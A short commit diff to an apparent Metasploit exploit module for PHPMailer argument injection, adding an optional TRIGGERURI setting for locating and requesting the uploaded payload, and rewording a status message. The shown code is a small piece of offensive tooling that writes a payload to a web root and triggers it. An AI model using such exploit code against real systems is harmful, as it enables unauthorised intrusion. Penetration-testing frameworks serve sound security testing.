Add an optional explicit triggeruri for phpmailer

zeroSteiner · zeroSteiner · commit 1eab4b3a7db6 · 2016-12-30T14:24:07.000-05:00
diff --git a/modules/exploits/multi/http/phpmailer_arg_injection.rb b/modules/exploits/multi/http/phpmailer_arg_injection.rb
@@ -48,8 +48,9 @@ def initialize(info = {})
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
-        OptString.new('WEB_ROOT', [true, 'Path to the web root', '/var/www'])
+        OptString.new('TARGETURI',  [true, 'Path to the application root', '/']),
+        OptString.new('TRIGGERURI', [false, 'Path to the uploaded payload', '']),
+        OptString.new('WEB_ROOT',   [true, 'Path to the web root', '/var/www'])
       ], self.class)
     register_advanced_options(
       [
@@ -58,7 +59,7 @@ def initialize(info = {})
   end
 
   def trigger(trigger_uri)
-    print_status('Sleeping before requesting the written file')
+    print_status("Sleeping before requesting the payload from: #{trigger_uri}")
 
     page_found = false
     sleep_time = 10
@@ -117,6 +118,7 @@ def exploit
     )
 
     register_files_for_cleanup(payload_file_path)
-    trigger(normalize_uri(target_uri, payload_file_name))
+
+    trigger(normalize_uri(datastore['TRIGGERURI'].blank? ? target_uri : datastore['TRIGGERURI'], payload_file_name))
   end
 end
